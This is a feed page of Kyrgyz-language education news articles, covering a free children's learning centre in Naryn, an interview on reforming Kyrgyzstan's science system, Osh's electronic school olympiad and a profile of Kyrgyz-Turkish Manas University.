Quantcast
Channel:
Viewing all 382 articles
Browse latest View live

ТОО КОЙНУНДАГЫ БОРБОР БАЛДАРГА БАРДЫК ӨНӨРДҮ ҮЙРӨТҮҮДӨ

$
0
0

Нарын областтык балдардын билим берүү борбору мектептен тышкаркы окутуп-тарбиялоонун көп түрлүү иш-чараларын колго алышып, байма-бай кароо-сынактарды өткөрүшүп, жыйынтыгын коомчулукка көрсөтүп далилдеп келишет. Аталган борбор Нарын шаарында 1998-жылы ачылып иштеп баштаган. Азыркы учурда борбордо орус, япон, англис, кытай  тилдерди үйрөтүү, өрмөк, кийиз менен иштөө, компьютер, шахмат, бий, комуз, «дилгир адабий», математика жана мектепке даярдоо ийримдери иштеп жатат. Бул билим берүү борборунда жалпысынан 20 мугалим эмгектенет жана булардын дээрлик бардыгы жогорку билимдүү, өз кесибинин чыныгы устаттары десек жаӊылышпайбыз. Аталган борборду 1998-жылдан бери  Назира Айыпова үзүрлүү жетектеп келет.

«Биз алгач иштеп баштаганда беш багыт менен ийримдер иштеген, андан кийин ата-энелердин суроо-талаптары улам өскөндүктөн, бүгүнкү күндө 14 багытта иш алып баруудабыз, — деп сөзүн баштады Назира         Айыпова. — Ошого жараша балдардын да кызыгуусу артып, келүү агымы күн өткөн сайын көбөйүүдө. Тээ башында 300дөн ашуун окуучу менен иштеп баштасак, бүгүнкү күндө 1300дөн ашык бала жума сайын үзбөй келип, кошумча билим алууда. Мисалы, англис тили ийримине бир тайпада 15-20дан бала окуй турган болсо, азыркы тапта 35тен ашык бала окуйт. Нарын областы эӊ алыскы, климаты катаал, тоолуу регион болгондуктан жана ата-энелердин жумушсуз катмары басымдуулук кылгандыктан, биздеги окуунун бардык түрү акысыз жүргүзүлөт. Балдарды акча тартыштыгына көз каранды кылбай, келечекте эл керегине жараган билимдүү уул-кыздарды өстүрсөк деген изги тилегибиз бар.

Мындан тышкары, акыркы 10 жыл аралыгында,  Тынчтык корпусу, «Жайка» Кыргыз-Япон адамды өнүктүрүү агентствосу жана Ага Хан фондусу  ж.б. чет элдик эл аралык уюмдар менен да тыгыз алакада иш алып баруудабыз. Ага Хан фондусу тарабынан бизге кыйла көп инвестициялар тартылды жана кенже курактагы үч тайпаны иштетип жатабыз. «Жайка» агентствосу тарабынан 2008-жылы биздин борбордун базасында япон-кыргыз ресурстук борборун ачып иштетип жатабыз. Ошол мезгилден бери карай Япониядан сегиз волонтер өз ыктыяры менен келип, сабак өтүп тил үйрөтүштү. Япон өлкөсүнөн келишкен ыктыярчылардан көп жакшы нерселерди, атап айтканда, тактыкты, калп айтпаганды жана убакытты үнөмдөп, туура пайдаланганды ж.б. үйрөнүүгө жетиштик. Алардын таалимин алып, япон тилинде эркин сүйлөп сабак берүүгө жетишкен кызыбыз Кубатова Нурзат эки ирет Японияга барып билимин өркүндөтүп келүүгө жетишти. Биз муну эӊ жогорку жетишкендик деп эсептейбиз, себеби эгерде япон өлкөсү биздин ишти жакшы деп белгилесе, анда иштин жыйынтыгын алуудабыз деп ойлойбуз. Ар жыл сайын япон тилине кызыгып окуйм деген балдардын саны көбөйүп, азыр 50 баладан ашып калды. Булар жеке эле тилди үйрөнүшпөстөн,  япондордун маданиятын, каада-салтын үйрөнүп өркүндөтүшүүдө. Мисалы, волонтер Атсуши Куваяма 2011-жылы атайын үч тайко барабанды (3000 АКШ доллар наркында) белекке тапшырган. Бүгүнкү күндө кыргыз окуучулары тайкодо япондордон кем эмес ойноп калышты.

Бүгүнкү күндө биздин борборго келип билим алып жатышкан балдарга кайсыл сабактар эӊ зарыл экендигин боолголоп билсек болот. Мисалы, математика, орус тили, англис тили ж.б. боюнча кошумча билим алууга келген балдардын агымы үзүлбөй, арбын болууда. Ал эми чыгармачылык боюнча биз быйыл  бий кружогун ачтык жана анын жыйынтыгын тогуз айдан кийин чыгарабыз. Окуучуларыбыз ошондой эле комузду күүгө келтирип чертүүнүн сырын да өздөштүрүп, кол өнөрчүлүктөн да колдо болгон материалдардан, чүпүрөктөрдөн куурчактарды жасашат.

Мындан тышкары, сүрөт ийрими ар түрлүү тематикадагы сынактарды өткөрүп жатат. Алсак: «Менин өлкөм кыргызстан», «Мен жашаган аймак», «Биздин кооз жаратылыш» ж.б. ушул сыяктуу сүрөттөрдү окуучуларыбыз жүрөгү менен берилип тартышууда. Шахмат кружогу ар бир эки ай сайын мектептер аралык мелдештерди өткөрүп, алдыӊкы окуучулар сыртка чыгып республикалык мелдештерге  да байма-бай катышып турушат.

Ата-энелер менен өтө тыгыз байланышта болуу менен атайын үч бурчтук программанын алкагында «Ата-эне, мугалим, окуучу» багытында иш алып барабыз. Андыктан, ата-энелер көзөмөлдөөчү болуу менен бизге демөөрчүлүк да кылышып, кенже курактагы балдарга окуу куралдарды, парталарды, телевизор, электр жылыткычтарды ж.б. сатып беришти. Демек, ата-энелер да биздин ишке кызыгышып, четте карап турушпагандыгы кубандырат. Аз болсо дагы биз материалдык-техникалык базабызды чыӊдап алдык.

Биздин борборго да буга чейин төлөтүп окутуу сунуштары болуп келген, буга мамлекет, министрлик жана жогорку бийлик органдары тарабынан эч тоскоолдук деле жок. Бирок биздин Нарындын шартында төлөтүп окутууга элдин  мүмкүнчүлүгү чектелүү. Ошондуктан акысыз окутууну туура көргөнбүз.

Республикалык деӊгээлдеги семинар-кеӊешмелерге үзбөй катышып турабыз жана тиешелүү статьялар боюнча бизге акча каражаттар өз убагында бөлүнүп берилүүдө. Жергиликтүү райондук жана шаардык билим берүү бөлүмдөрү, областтык усулдук билим берүү борбору жана Өкмөттүн Нарын облустук ыйгарым өкүлчүлүгү менен да алакалаш иш жүргүзүп келебиз. Булар да биздин ишибизге кызыкдар болушуп, байма-бай келип-кетип турушат. Мындан тышкары, облустук жатак мектеп-лицейине биздин  мугалимдер кол өнөрчүлүк боюнча жеринде барып, акысыз сабак өтүп, балдардын чеберчилигин өркүндөтүшүүдө. Ар түрдүү иш- чараларды, кароо-сынактарды өткөрүүүчүн биздин мугалимдер, демөөрчүлөрдү издеп таап, окуучуларга стимул берип келишет. Мисалы, «Тамашоу», «Шахматтык мелдешмелер», «Япон фестивалы», «Кара Жорго бий сынагы», «Жаш талант» ж.б. иш-чаралар өткөрүлүп турат.  Балдардын келечегине кайдигер карабаган атуулдарыбыз демөөрчүлүк кылышып, колдорунан келген жардамдарын эч аянышпайт. 1998-жылдан бери  ар жыл сайын «Жаш талант»  фестиваль кароо-сынагы өткөрүлүп келет. Акыркы 15 жылдан бери ушул фестивалды «Балтаттуу» уюму менен «Дордой» ассоциациясы колдоого алып, балдардын шыгына-шык, демине-дем кошуп келатышат.

Конкурстарга катышып жеӊип чыккан балдарыбыз, азыр республикалык «Сармерден» теле-шоусунун жылдызы болуп келаткан Талант Карагулов, ырчы Аскат Мусабеков, Абдылдаева Селима, Каленов Алтынбек ж.б. учурунда менин колуман грамота алышкан эле. Демек, биздин борбор аркылуу ушундай кароо-сынактардын байма-бай өтүп турушу балдардын келечегине кеӊири жол ачат десем жаӊылышпайм.

Бизде иштегендердин айлык маяналары аз бойдон калууда. Пенсияга чыкканда деле эӊ аз  өлчөмдөгүөп-чап акча менен гана пенсияга чыгып калышууда. Эгер айлыктары арбын болсо, мугалимдер үчүн абдан чоӊ стимул болмок. Япониядан келгендер да бизге өз баасын беришип: «Кыргызстандын эӊ алыскы, тоолуу регионунда, элден акча албастан акысыз окутуп жатканыӊарга тереӊ ыраазыбыз жана элиӊер да ыраазы болсун», — деп баалашты. Демек, биздин ушул жасап жаткан ишибиздин жыйынтыгын, жемишин жакынкы жылдары окуткан балдарыбыздан алабыз деген зор үмүтүбүздөн тайбастан, бел чечпей иштеп, билимибизди тартуулай бермекчибиз».

Кадыркул Бугубаев,  журналист,  Нарын областы


Абдиманнап МУРАТОВ, Кыргыз Республикасынын Билим берүү жана илим министрлигинин алдындагы Илим департаментинин директору: “Департаменттин түзүлүшү илимий тармактын башкаруу системасын өзгөртөт”

$
0
0

- Урматтуу Абдиманнап Аттокурович, Билим берүү жана илим министрлигинин алдында Илим департаментинин түзүлүшү бул тармакка кандай өзгөрүүлөрдү алып келиши мүмкүн?

- Илим тармагы он, он беш жыл аралыгында бир топ артта калып калгандыгы жашыруун эмес. Өткөн жылы КР Президентинин алдындагы көз карандысыз эксперттик кеӊештин сунушу менен бул тармакты реалдуу түрдө реформалоо зарылдыгы айтылып, өкмөттүн алдына сентябрь айында күн тартибиндеги маселе катары коюлган. Мында Кыргызстанда болуп келген илимдин кадыр-баркын көтөрүү, кайрадан калыбына келтирүү,  эӊ негизгиси илим тармагы Кыргызстандын экономикасын, социалдык шартын өнүктүрүүгөөзүнүн салымын канткенде кошо алат  деген суроолор каралган. Ошонун негизинде КР Өкмөтүнүн алдында жумушчу топ түзгөнбүз. Жумушчу топ үч айдын ичинде бул багытта атайын концепция иштеп чыккан. Бул концепция бир нече жолу коомчулукта талкууланып, 2015-жылдын апрель айында кабыл алынган. Концепция «Кыргыз Республикасындагы илим системасын реформалоо» деп аталат. Концепцияда үч чоӊ багыт бар. Биринчиси — башкаруу системасын өзгөртүү. Себеби, илимге Совет мезгилиндегидей артыкчылык берилбей калды. Мурда илим тармагы чоӊ тармак болуп келсе, кийин  рыноктук карым-катнаш экономикасынын шарты менен мамлекеттик чоӊ органдан кичирейип келип, министрликтин бир бөлүмү болуп калды. Буга чейин Улуттук илимдер академиясы, улуттук илимий борборлор, илимий институттар өз-өзүнчө жашап, каржылык багыты да ар кандай чечилип,  координация болбой келген. Экинчи жагынан мамлекеттик бирдиктүү саясат да иштелген эмес. Экинчи тармагы — бул илим тармагын каржылоо. Илим тармагы дүйнө жүзүндө аябай өнүккөн мамлекеттерде ички дүӊ продукция менен эсептеп келгенде орто эсеп менен 1,74 пайызга чейин бөлүнөт. Кыргызстанда ал 0,09га да жетпейт. Казакстан, Россияны алсак 0,14- 0,17ге чейин барат. Эми мамлекет чоӊ реформа жасай койсок эле көп каражат берет деп айта албайбыз. Бирок бизге бөлүнгөн каражатты аз-көп дебей бүгүнкү талаптарга ылайык сарамжалдуу пайдаланышыбыз керек. Үчүнчү багытына бүгүнкү талаптарга ылайык илимий кызматкерлерди даярдоо, илимий  даражаларды бизде да, башка өлкөлөрдө да таануу багытындагы иштер кирет. Концепцияда мындан тышкары 2016-2020-жылдары кандай иштер аткарылышы керек   экени жазылып келип, үч багытка мерчемделген. Азыркы Билим берүү жана илим министрлигинин алдында атайын илим департаментинин түзүлүшү да илимдин башкаруу тармагына каралган өзгөртүү болуп саналат. Департаменттин дагы бир максаты — илим тармагындагы бирдиктүү саясатты ишке ашыруу. Бардык илимий мекемелердин аткарган ишин көзөмөлдөө, каржылоо, адистерди даярдоо ж.б. багыттагы  маселелердин баарын ушул департамент көзөмөлдөйт. Илим департаменти өзүнчө юридикалык статуска ээ, бирок министрликтин алдында иш алып барат. Бизде илим тармагын каржылоо үчүн атайын Улуттук илим фонду да өкмөттүн токтому менен түзүлдү. Бул дагы тармактагы башкаруу системасын өзгөртүүнүн бирден-бир кадамы болуп эсептелет. Каражатыбыз анча деле көп эмес. Түшкөн каражаттар илим тармагына конкурстук негизде грант катары бөлүнүп турмакчы. Ошондой эле премьер-министрдин алдында “Илим жана инновация” боюнча  кеӊеш түзүлгөн.   Премьер-министрдин катышуусунда ошол кеӊештин биринчи отуруму 2-декабрда болду. Эки саат бою илим тармагынын иши кеӊири талкууланды. Бул кеӊештин негизги максаты — Кыргызстанда илимдин кайсы тармагын биринчи кезекте өнүктүрүү керек, артыкчылыкты кай жагына берүү сыяктуу маселелерди чечип, ошонун үстүндө иш алып баруу.

- Улуттук илим фондун ким каржылайт?

- Кыргызстандагы илимди каржылай турган бир эле мамлекет  болуп калууда. Каражаттын баары эми ошол фондго келип түшөт. Ошол фонд аркылуу баарына бөлүнөт. Мындан тышкары чет өлкөлөрдөгү илимий фонддор менен да сүйлөшүп, каржы булагын жеринде табуу жагы каралган. Ошондой эле башка жеке ишкерлер, компаниялар, спонсорлор сыяктуу  каржы  булактарын пайдалануу зарыл. Фонд департаменттин алдында болот. Мында тармактар боюнча эксперттик кеӊештер түзүлүп, кайсы багытка каржы бөлүнүшүн ошолор аныктайт. Алардын сунушу менен гана департамент аныкталган тарапка каржы бөлүп, бир жылдан соӊ отчетун алат. Жыйынтыгы болбосо департамент каржыны кайрып алат, же жакшы натыйжа берип баштаса каржылоосун улантат. Бул эриш-аркак диалог шартында көзөмөлдөнүп, акча каражатынын сарамжалдуу пайдаланышына түрткү берет деп ойлойм.

- Илим тармагынын концепциясына ылайык Кыргыз улуттук илимдер академиясында кандай өзгөрүүлөр болмокчу? 

- Улуттук илимдер академиясынын курамында өзгөрүүлөр болот. Ал жерде 23 институт бар. Алар өздөрү деле реформа жасайлы деп турушат. Бирок, менин оюмча, реформа жасаш үчүн укуктук-нормативдик документтерди даярдашыбыз керек. Улуттук илимдер академиясы жөнүндө атайын мыйзам бар.  Аны да карап чыгышыбыз парз. Бул маселе боюнча атайын ведомстволор аралык жумушчу топ түзүлүп жатат.

- Көпчүлүк өнүккөн өлкөлөрдө илим ЖОЖ тармагында жакшы өнүгөрүн айтып жүрүшөт?

- Жогоруда айтылган концепцияда да бул багытта иштер каралган. Дүйнөлүк тажрыйба көрсөткөндөй, академиялык илимий изилдөө институттары ЖОЖдор менен интеграция болуп, бирге иштеп кетсе көп эффект берет экен. Ошондуктан көпчүлүк чет мамлекеттерде илим негизинен ЖОЖдордо жүргүзүлөт. Муну  ЖОЖдук илим деп коет. Бирок  биз Улуттук академияны окуу жайлардын акчасы бар деп аякка таратып берип койсок өнүгүп кетет деген бул туура эмес көз караш. Себеби ЖОЖдордун акчалары контракттан келген акчалар. Аны илимге иштеткенге болбойт. Бирок ЖОЖдор  гранттарды алып иштетип, жаштарга илимге жол ачышы керек. Акыркы курстарда окуган студенттерди илимге алып калганга ЖОЖдор өздөрү да кызыкдар болууга тийиш.

- Жаштар демекчи, концепцияда жаштар туурасында маселе каралганбы?

- Жаштарды илимге тартыш, илимдин кайсы тармагына артыкчылык  бериш керек, кимге бербеш керек дегендин баары бири-бирине байланышы бар маселелер. Мисал үчүн илимдин кандидаттарына, докторлоруна кошулган акчаны көбөйтсө деген ойлор айтылып жүрөт. Сиз айткандай, “кыргызчасынан” чоӊ кызматта отурганда илимий даража алып койгондор бар. Бирок азыркы учурда илимде эч кандай иш кылбайт. Өкмөт башчыбыз Т.Сариев ошолорго жөн эле акча төлөштүн кереги барбы деген маселени да айтты? Андан көрө  эртеден кечке лабораторияларда илим деп жүргөндөрдү колдогонубуз дурус го. Аспирантурада окугандарга 1500 сом стипендия төлөнөт. Бул, албетте, бүгүнкү күндө аз. Эми илим жактайм деген адам жигердүү болуш керек. Ал стипендияны эле карап олтура бербей эл аралык уюмдарга гранттарды жазып, тил үйрөнүп, изденип иштеп акча табышы абзел. Биз деле убагында аз стипендия алып иштегенбиз. Илимде саны эмес, сапатын өстүргөнгө көӊүл бурганыбыз оӊ.

- Башка тармактардай эле илимде да коррупция орун алганы белгилүү эмеспи. Бул багытта кандай аракеттер болмокчу?

- Бул, тилекке каршы, бардык жерде бар. Биз илимий даража алыш үчүн мынча акча берет экен дегенди угуп эле жүрөбүз. Колдон кармап албагандан кийин муну далилдеш да кыйын. Бирок жөн жерден сөз айтылбайт эмеспи. Аттестациялык комиссия тарабынан андай көрүнүштөрдү жоюу боюнча бир топ иштер жүргүзүлүүдө. Концепцияда да бир топ иш-чаралар каралган. Аны жоюш үчүн жаӊы тоскоолдуктарды ойлоп таап жатабыз. Мисал үчүн, илимде азыр баллдык системаны киргиздик. Баллды  топтош үчүн кеминде эки чет мамлекеттеги журналдарда илимий эмгектерди жарыялашы парз. Мындан тышкары Индекс хирша деген ыкма бар. Бул ошол илимий изилдөөчүнүн дүйнөлүк интеграцияга киришин, аралашын шарттайт. Эгер ал илимий ишин башка жактарга чыгарса, сырткы чөйрө аны таанып, ага сунуш бериши мүмкүн. Жарыяланган эмгек канчалык көп окулса, цитата келтирилсе ошончо көп балл топтолот. Мунун баары жанагы 15 макала жазып алып   кандидат болушум керек дегендерге табигый бөгөт. Албетте, мынча китеп, мынча макала жазды деген совет мезгилинен бери келе жаткан ыкма. Ал эми Индекс Хирша ошондой эмгектердин сапатын, чындыгын аныктай алат. Бизде азыр жарандарыбыз чет жерде жүрүп алып деле илимий эмгектерин жарыялап жатышат.

- Бизде аткаруу бийлигинде  жүрүп илимий иштер менен алектенип, кандидат, доктор болуп алгандар жөнүндө ММКларда айтыла калып жүрдү эле? Алар кайсы учурда илим жазганга жетишип жатат деген пикир пайда болбой койбойт?

- Азыркы учурда жогорку аттестациялык комиссия тарабынан Жобого атайын өзгөртүүлөр киргизилген. Жаӊы жобо боюнча аспирантураны күндүзгү бөлүмдө гана окууга туура келет. Мурда таптакыр башка жерде иштеп   изденүүчү катары коюп,  макалаларын тийиштүү көлөмдө жарыялап, илимий эмгек жактап кандидат, доктор болуу бар болчу. Азыр андайга жол жок.  Ал эми изденүүчүлөргө эгерде тийиштүү тармакта илимий кызматкер болуп беш жылдан кем эмес иштесе,  аттестациялык комиссиянын уруксаты менен гана илим жактаса болот.

 Маектешкен Майрамбек ТОКТОРОВ,

“Кутбилим” 

ЭЛЕКТРОНДУК ОЛИМПИАДА АДИЛЕТТҮҮЛҮККӨ ЖАНА АКЫЙКАТТУУЛУККА ИШЕНИМ АРТТЫРАТ

$
0
0

 

Ош шаардык билим берүү  башкармалыгы окуучулардын шаардык олимпиадасын электрондук форматта өткөрдү. Баса, бул аймакта быйыл предметтик олимпиаданын биринчи баскычы да айрым мектептерде электрондук түрдөөттү. Алсак, Ош шаарындагы №52 «Кыргыз-түрк достугу» атындагы таланттуу балдардын мектебинин окуучулары электрондук түрдө сынак тапшырып жатканына Ош шаардык билим берүү башкармалыгынын башчысы К.Кимсанов өзү күбө болду.

Зээндүү окуучулардын жөндөмдөрүн жана көнүгүүлөрүн ачуу жана колдоо, жалпы орто билим берүү системасында билим алган окуучулардын, мугалимдер жана педагогикалык-илимий кызматкерлер арасындагы атаандаштыкка жараша шыктуулардын чыгармачылык өз ара мамилелерин өнүктүрүү максатында аймактык жана республикалык олимпиаданы өткөрүү мөөнөттөрү аныкталып, быйылкы сынактын өзгөчөлүктөрү белгиленүүдө. Маселен, адистердин акыркы берген маалыматтарына таянсак, предметтик олимпиаданын Жобосу жаӊыланып, быйыл республикалык баскычты жылдагыдай министрлик эмес атайын түзүлгөн уюштуруу тобу өткөрмөк болду. Бул тууралуу дагы жазабыз. Ал эми Ош шаардык билим берүү башкармалыгынын демилгеси менен өткөн жылдан бери олимпиаданын шаардык баскычы электрондук форматта өткөрүлүп келатат. Быйыл дагы булар ошол ыкмадан четтешкен жок.

Ош шаардык билим берүү башкармалыгынын башчысы Куштарбек Кимсановдун айтымында,  сынак  артында нааразычылыктар болбой койбойт. Бирок электрондук олимпиадада окуучулар нааразы болмок турсун, өздөрүнүн берген жоопторунан уялып, апелляцияга да киришпейт экен.

- Олимпиада аркылуу окуучулардын жалпы билим деӊгээлин баалоо мүмкүн эмес экендигин эске алуу керек дагы, билим сапаты жөнүндө күрөшүүдө аны өзүнчө карабаш керек дейм. Экинчиси, олимпиаданын өзүнүн өткөрүлүшү жыл сайын жаӊыланып, жакшырып туруу аркылуу  ата-энелердин жана окуучулардын, ал тургай мугалимдердин  олимпиаданын адилеттүүлүгүнө жана акыйкаттуулугуна ишеним арттырат. Ал ишенимди арттыруу үчүн эски колдонулуп келген иш-аракеттерди кайталоо бүгүн натыйжа бербейт. Анткени азыр жаӊы технологиянын кылымы. Ал тургай онлайн түрүндө олимпиаданы алууга боло тургандыгына деле биз ынанышыбыз керек.  Бирок ага өтүүүчүн техникалык мүмкүнчүлүктөрүбүз, балким азырынча жалпы республикалык деӊгээлде жете элек. Шаарларда айыл жерлерине  караганда мүмкүнчүлүктөрү жакшы болгону менен, айрыкча, четте жайгашкан айылдарда техникалык билим берүү мүмкүнчүлүк алдыга өзгөчө секирик жасаганга түрткү боло албайт.  Ошону эске алып туруп, биз, Ош шаары, былтыркы окуу жылынан бери  олимпиаданы электрондоштуруп өткөрүп келатабыз. Мурда “жыгылган күрөшкө тойбойт” дегендей, ким жеӊилип калса эле туура эмес болду деп сөз чыгарып  жана көбү апелляцияга жазышчу. Ал эми  электрондук олимпиадада апелляцияга жазылган бир дагы арыз болгон жок. Бизде эӊ мыкты окуйт деген балдар кирип, бирок бешке окубаган балдардан жеӊилип калганда  апелляцияга жазгыла десек да болушкан жок. Жооптору дагы монитор аркылуу көрүнүп турду.  “Эч ким мени алдаган жок, эч ким мага жардам да бере алган жок. Менин чыныгы билимим, даярдыгым ушул экен” деп окуучулар апелляцияга барышкан жок.  Бала мойнуна ала билди.  Андан сырткары,  бала олимпиадага компьютердин алдына келип отурганда аны сырттагы биринчи жана экинчи кабаттагы мониторлордо мугалимдер, ата-энелер көзөмөл жүргүзүп турушту, — дейт      Куштарбек Кимсанов.

Электрондоштурууга киргизүү абдан татаал болуптур. Ошого карабастан, Ош шаардык билим берүү башкармалыгы жаӊыча олимпиада өткөргөнгө жетишти. Ириде олимпиаданы өткөрүү боюнча программа ылайыкталып түзүлгөн экен. Тесттин базасына 1000 ашык суроо киргизилген.

- Олимпиаданы  бир гана программист  өткөрөт. Ал жерге ашыкча адамдын кереги жок. Калыстар тобуна да көз каранды болбойт. Жыйынтыгы да ыкчам чыгарылат.  Биз бул ыкманы Билим берүү жана илим министрлигине сунуштадык.  Эгер министрлик чечим кабыл алса, биз келип программаны презентациялап бергенге даярбыз. Анын артыкчылыктары көп. Ириде  ата-энелердин ишенимин арттырат, — дейт башчы.

Гүлнара Алыбаева,

“Кутбилим”

КОРРУПЦИЯСЫЗ ӨНҮККӨН УНИВЕРСИТЕТ

$
0
0

DSC_5206Быйыл Кыргыз-Түрк «Манас» университети 20 жылдык  мааракесин белгиледи. Эки өлкө  биргелешип   ачкан  бул  университет — Кыргызстандын   соӊку жаӊы тарыхындагы  жемиштүү, келечектүү   инвестициялардын  бири болду. Бул университетке     жумшалып   жаткан   сексен алты миллион  АКШ долларынын ар бир центине чейин орундуу, сарамжалдуу  колдонулуп жатканы,  анда  20 жыл ичинде  жүргүзүлгөн иштердин   натыйжасынан  айкын  көрүнөт.

Кезинде Манас  көчөсүндөгү  эки кабат  имаратты  ижарага  алып  алгач  кадам таштаган  университет  бүгүн Кыргызстан эмес,  Борбор Азиядагы  теӊдеши  жок,  заманбап  университет  шаарчасына   ээ болуп, ургаалдуу өнүгүп жаткан цивилизациянын  очогуна айланып отурат.  Андагы  заӊгыраган  окуу имараттары,  жаӊы технологиялар менен  жабдылган, мизилдеген аудиториялар,  конференция залдары, компьютердик класстар, лабораториялар, китепканалар  студенттердин тереӊ билим алуусуна кызмат кылат. Китепканасы ичинде  бардык шарттары  бар 1368  орундуу  студенттик  жатакана,  керектүү медициналык  аппараттар  менен  толук жабдылган  ден соолук борбору  студенттердин кызматында.

Кесиптик  жана илимий  багыттарына  ылайык    экономика жана  башкаруу,  табигый   билимдер, ветеринария,  айыл чарба, инженердик факультеттеринде, кесиптик  жогорку  мектептерде студенттердин алган теориялык  билимдерин практика жүзүндө бекемдей турган 38 лаборатория, теле студия  ишке берилген. Акыркы  жылдары кескин көбөйгөн  университеттин  эл аралык  байланыштарынын  негизинде  142   илим, билим берүү  тармагындагы   кызматташуу   жаатында  дүйнөнүн көптөгөн   мартабалуу университеттери менен   келишимдер түзүлгөн. Табигый илимдер, так илимдер  жана гуманитардык    илим багыттары  боюнча  акыркы 5 жылда   29  илимий  долбоордун  үстүндө  жигердүү   изилдөөлөр  жүргүзүлүп жатат.

2012-2015-жылдар аралыгында  профессордук-окутуучулар  курамы илимий-изилдөө  максатында   757 жолу  иш сапары менен  өлкө  ичине, жакынкы  жана алыскы  чет өлкөлөргө   иш сапарына  чыгып келишкен. 2013-2014 жана 2014-2015-окуу жылында  200гө  жакын    студент чет өлкөлөргө барып   практикадан  өтүп  келишкен.

Окуу процесси   демекчи,  КТМУ   Борбор Азияда  биринчилерден болуп  Болон  процессинин  системасында   иш жүргүзгөн  университет. Ачылган  күндөн тартып  эле  бул  система  университетте   үзүрлүү иштеп жатат. Профессордук-окутуучулук жамаатынын  эмгегин  баалоо боюнча эл аралык стандарттарга ылайык  рейтингдик  система киргизилген. Бул Кыргызстанда биринчи жолу болуп отурат.

Кыргызстандын ЖОЖдорунда коррупция күчөп кетти деп, бул коомдук-социалдык «илдет» менен кызуу күрөшүп жатышат, бирок майнап жок. Ал эми Манас университетинде коррупция жок. Академиялык  тазалык — университеттин  сыймыктуу  визиткасы десек болот. Лекцияга, семинардык сабактарга  келбей   модуль  тапшыруу   же  сессияга  келбей  экзамен,  зачеттордон  баа алуу  КТМУнун  студенттеринин  түшүнө да кирбейт. Алар  үчүн  жатаканада   болсун, китепканада болсун, лабораторияда болсун окуу  программасын   өздөштүрүү көнүмүшкө айланган, жанталашып окушат,  күнү-түнү  китептен,  ноутбуктан баш көтөрүшпөйт. Мектеп  окуучусундай  китеп, ноутбук салынган ранц көтөрүп жүрүү алар үчүн  эрөөн-төрөөн  эмес. Чындыгында  эле Манас университетине  барганда билимге умтулган, изденген, көздөрү жанган, тирикарак жаштарды  көрүп,  студенттердин  профессордук-окутуучуларга   карата  сый  мамилесин көрүп    ыраазы болбой койбойсуӊ. Талас, Нарын, Баткен өӊдүү провинциалдык университеттерди эске албаганда дээрлик бардык ЖОЖдордо табигый так  илимдер, техника, медицина тармагындагы сабактар орус тилинде өтүлүп келет, ал эми Кыргыз-Түрк «Манас» университетинде сабактар кыргыз, түрк тилдеринде өтүлөт. Бардык илим тармактары боюнча изилдөөлөр кыргыз жана түрк тилдеринде жүргүзүлөт. Демек,  мамлекеттик  тил бул университетте жолго коюлган десек болот.

Илимий изилдөөлөр  боюнча  ири долбоорлордун,  программалардын    жүргүзүлүп жатышынын   натыйжасы  жөнүндө университеттин  ректору математика   илимдеринин доктору, профессор   Себахаттин    Балжы: — Биз  баарынан мурда  илимий-изилдөөлөрдү  күчөттүк. Билим берүү менен  илим  айкалышуусу зарыл. Эл аралык мартабалуу  илимий  журналдарга  изилдөөлөрүнүн жыйынтыгы   боюнча  эмгектерин жарыялаган     жаш  окумуштуулардын  катары көбөйдү.  Бул биздин университетте  окуу процесси  менен  илимий-изилдөө иштери  айкалышып жүргүзүлүп  жатканын далилдейт, — деди.

  Ырасында эле математика  илимдеринин   доктору, профессор  Себахаттин  Балжы  университетти   жетектеген акыркы  беш  жылда билим жаатында  алдыга   секирик жасоонун  жылдары  болгон. Өзүнүн олуттуу  илимий эмгектери  менен  алыс-жакынга кеӊири  таанымал болуп,  математика илиминде  мартабалуу  абройго  ээ болгон  профессор  С.Балжы келгенден тартып  университеттин  илимий потенциалын  бекемдеп,  илимий долбоорлорго   өзгөчө  көӊүл бөлүп, алардын жүзөгө ашуусун   шарттаган. Натыйжада  эл аралык  мартабалуу   илимий  журналдарга SSCI, AHCI жана SCI-exp-де КТМУнун  шилтемеси   берилген макалалар  кескин көбөйгөн. Мисалы,  2010-жылы  болгону 3 макала  болсо, 2014-жылы  алардын саны  114кө жеткен. Профессор  С.Балжынын  жетекчилиги астында  Кыргыз-Түрк «Манас» университети   болуп көрбөгөндөй   ийгиликтерди жаратуу менен  илимий-изилдөөлөрдүн  борборуна   айланып  отурат  десек болот. КТМУ адистерди сапаттуу  даярдоонун,  академиялык тазалыктын,  алдыӊкы билим технологияларын жайылтуунун,  илимий долбоорду уюштуруунун  үлгүлүү  модели болуп калды. Атактуу Анкара университетинде  өсүп жетилип, илимдин доктору болуп, профессор наамына  жетип, Түркиянын ЖОЖдорунда башкаруу кызматтарда жүрүп көп тажрыйба топтогон С.Балжы  КТМУну Борбор  Азиядагы эле эмес,  КМШдагы  мартабалуу университеттердин катарына кошуу үчүн бел чечпей  иштеп, изденип жаткан кези.

Кезинде И.Арабаев атындагы университеттин  жана Ж.Баласагын атындагы      КУУнун ректору болгон, академик А.Бөрүбаев кесиптеши жөнүндө мындай деди:

- Себахаттин Балжыны топология боюнча эл аралык  кадыр-баркы бар адис катары да билчүмүн,  ал азыр өзү жетектеген университеттин масштабында реформаларды натыйжалуу  жүргүзүп жатат. Университет билим берүүнүн сапаты, илимий-изилдөөлөрдүн жыйынтыгы боюнча  Борбор Азиядагы эӊ мыкты университеттердин катарында турат.

 Кыргыз-Түрк  «Манас» университети  өзүндө эле чоӊ илимий форумдарды, симпозиумдарды  уюштурбастан, Кыргызстан тарабынан  уюштурулган иш-чараларга  жигердүү  катышып келатат. Мисалы,          2014-жылы Түрк дүйнөсүнүн  математиктеринин  эл аралык конгрессине  дүйнөнүн 18  мамлекетинен  окумуштуулар катышкан, ал эми 2015-жылы өткөн 8 мамлекеттин математиктери  катышып,  Ысык-Көл  Эл аралык форумун  өткөрүүгө да өзүнүн чоӊ  салымын кошкон.

Университет акыркы  жылдары заманбап  билим технологиясы  менен  жабдылган  окуу имараттарын  куруп ишке киргизилиши,   материалдык-технологиялык  базасынын чыӊдалып жатышы ректор Себахаттин Балжы окуу процессин, илимий-изилдөө иштерин жакшы жолго койгон  мыкты  администратор –башкаруучу эле эмес, мыкты  менеджер  экенин да  көрсөттү.

Эмесе  Кыргызстандын келечеги  үчүн  мыкты  адистерди   даярдап  жаткан  университетке ийгилик     каалайбыз!

Аскар Медетов,

филология илимдеринин кандидаты

ПОЛИФОНИЯ – ПУТЬ ВЗАИМОПОНИМАНИЮ И УСПЕХУ

$
0
0

